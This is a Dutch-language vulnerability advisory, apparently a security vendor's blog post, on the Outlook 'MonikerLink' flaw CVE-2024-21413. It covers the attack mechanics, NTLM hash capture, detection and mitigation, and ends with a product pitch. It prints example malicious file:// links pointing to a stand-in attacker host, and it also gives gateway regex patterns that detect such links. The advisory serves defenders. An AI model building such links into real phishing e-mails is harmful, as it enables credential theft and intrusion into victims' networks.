CVE-2024-21413: Microsoft Outlook MonikerLink RCE
Kort samengevat: CVE-2024-21413, bijgenaamd "MonikerLink", is een kritieke Microsoft Outlook-kwetsbaarheid die Protected View omzeilt om remote code execution en NTLM-credentialdiefstal te bereiken — simpelweg door een kwaadaardige e-mail in het voorbeeldvenster te bekijken. CVSS 9,8 KRITIEK. Geen gebruikersinteractie nodig behalve het bekijken van de e-mail in het voorbeeld.
| Kenmerk | Waarde |
|---|---|
| CVE ID | CVE-2024-21413 |
| CVSS-vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-20: Improper Input Validation |
| Gepubliceerd | 13 februari 2024 |
| Exploitatie | Publieke PoC — op grote schaal geëxploiteerd |
CVSS 9,8 — KRITIEK
Wat is CVE-2024-21413?
CVE-2024-21413 misbruikt de manier waarop Microsoft Outlook hyperlinks verwerkt die het teken ! (uitroepteken) bevatten als onderdeel van een file-moniker-URI. Normaal gesproken past Outlook "Protected View" toe op documenten die vanuit e-mail worden geopend — waardoor Office-documenten in een sandbox draaien om codeuitvoering te voorkomen. Deze kwetsbaarheid omzeilt die bescherming volledig.
Door een hyperlink te constructen in het formaat file://ATTACKER-SERVER/test.rtf!something, laat een aanvaller Outlook het RTF-bestand openen zonder Protected View, terwijl tegelijkertijd automatisch een NTLM-authenticatiepoging naar de SMB-server van de aanvaller wordt getriggerd. De aanvaller vangt de NTLMv2-hash op voor offline kraken of relay-aanvallen.
Deze kwetsbaarheid activeert in het Outlook-voorbeeldvenster. Het slachtoffer hoeft de e-mail alleen maar te selecteren in de inbox — geen bijlage openen, geen link aanklikken vereist. In een bedrijfsomgeving zou één phishing-e-mail naar een distributielijst honderden NTLMv2-hashes tegelijk kunnen compromitteren.
Getroffen producten
| Product | Getroffen versies |
|---|---|
| Microsoft Outlook 2016 | Vóór de update van februari 2024 |
| Microsoft Outlook 2019 | Vóór de update van februari 2024 |
| Microsoft Outlook LTSC 2021 | Vóór de update van februari 2024 |
| Microsoft 365 Apps for Enterprise | Vóór de update van februari 2024 |
Niet getroffen: Outlook op het web (OWA), Outlook voor iOS/Android, Outlook voor Mac. De kwetsbaarheid is specifiek voor Windows desktop Outlook-clients.
Aanvalsmechaniek: de MonikerLink-techniek
Windows COM (Component Object Model) gebruikt "monikers" om objecten op naam te binden. Het URI-schema file:// in Windows kan een monikercomponent bevatten na het teken !, wat Windows instrueert om het genoemde COM-object te laden en te activeren.
# Normal file link — Protected View applied file://attacker.com/share/document.rtf # MonikerLink bypass — ! bypasses Protected View file://attacker.com/share/document.rtf!1337 # When Outlook processes the MonikerLink: # 1. Attempts SMB connection to attacker.com # 2. Sends NTLMv2 authentication (captures hash) # 3. Opens file without Protected View # 4. If file is malicious RTF → RCE
NTLM-hash-captureflow
Zelfs zonder een gewapend RTF-bestand is de NTLM-relay-aanval impactvol:
- Slachtoffer bekijkt kwaadaardige e-mail in Outlook in het voorbeeld
- Outlook maakt automatisch een SMB-verbinding met de door de aanvaller gecontroleerde server
- Windows stuurt een NTLMv2-challenge-response (hash) om te authenticeren
- Aanvaller vangt de hash op met Responder, Impacket of vergelijkbare tools
- Hash offline gekraakt (zwakke wachtwoorden binnen uren) of realtime doorgestuurd naar andere diensten
Exploitatie in de praktijk
Na de publieke release van de PoC werd CVE-2024-21413 binnen enkele dagen opgenomen in commerciële phishingtoolkits. Waargenomen campagnes omvatten:
- Diefstal van bedrijfscredentials: bulk-e-mails naar zakelijke distributielijsten om grote hoeveelheden NTLM-hashes te vangen
- Gerichte initiële toegang: spear-phishing van directieleden met e-mails op maat die MonikerLink-payloads bevatten
- Lateral movement-ketens: NTLM-relay vanuit gevangen hashes naar interne diensten (SMB, LDAP, HTTP)
- Business email compromise: diefstal van credentials die mailboxtoegang mogelijk maakt voor BEC-fraude
Detectie
E-mailgateway-regels
# Regex pattern for MonikerLink in email body/attachments # Detect file:// links containing ! character \bfile:\/\/[^\s"']+![^\s"']* # Block external UNC/file links entirely (recommended) \bfile:\/\/[^\s"']+ \\\\[a-z0-9.-]+\\
Netwerkdetectie
- SMB-verbindingen vanaf endpoint-werkstations naar externe IP-adressen (zou nooit mogen voorkomen)
- NTLMv2-authenticatiepogingen naar onverwachte bestemmings-IP's
- DNS-query's voor domeinen van aanvallers vanuit mailclients
Endpointdetectie
- OUTLOOK.EXE dat uitgaande TCP/445-verbindingen initieert
- Office-processen die na het bekijken van e-mail child-processen starten
- LSASS-toegang vanuit Office-processen
Mitigatie
- Pas de patches van februari 2024 toe: de Microsoft Security Update voor Outlook verhelpt de Protected View-omzeiling
- Blokkeer SMB uitgaand aan de perimeter: firewallregels die TCP/445 en TCP/139 uitgaand blokkeren voorkomen NTLM-hashcapture, zelfs als de kwetsbaarheid wordt getriggerd
- Schakel NTLM-relaybescherming in: configureer SMB-signing en LDAP-signing om relay-aanvallen te voorkomen
- Implementeer een Email Security Gateway: blokkeer e-mails met
file://- en\\-links (UNC-pad) in de body en bijlagen - Schakel NTLM uit waar mogelijk: organisaties die Kerberos gebruiken, kunnen NTLM uitschakelen om het hash-capture-aanvalspad te elimineren
💡 Defense in Depth: zelfs als Outlook gepatcht is, is het blokkeren van uitgaande SMB aan de firewall een best practice die deze hele aanvalsklasse voorkomt. Veel organisaties staan uitgaande SMB toe vanwege legacy-bestandsdeling — audit en beperk dit onmiddellijk.
KENSAI-detectiemogelijkheden
- Inventarisatie van e-mailclientversies: KENSAI identificeert Outlook-versies binnen uw organisatie en markeert ongepatchte versies die kwetsbaar zijn voor CVE-2024-21413
- Phishingsimulatie: de phishingassessment-module van KENSAI kan de gevoeligheid van werknemers voor MonikerLink-achtige lokmiddelen testen
- Netwerkblootstellingsanalyse: identificeert verkeerd geconfigureerde firewalls die uitgaande SMB vanaf werkstations toestaan
- Patchcompliance: continue monitoring van Microsoft Office-patchniveaus tegen bekende CVE-dekking
KENSAI scant uw endpointvloot op kwetsbare Outlook-versies en identificeert netwerkpaden die NTLM-hashcapture mogelijk zouden maken. Krijg in enkele minuten inzicht.
Beoordeel uw e-mailaanvalsoppervlak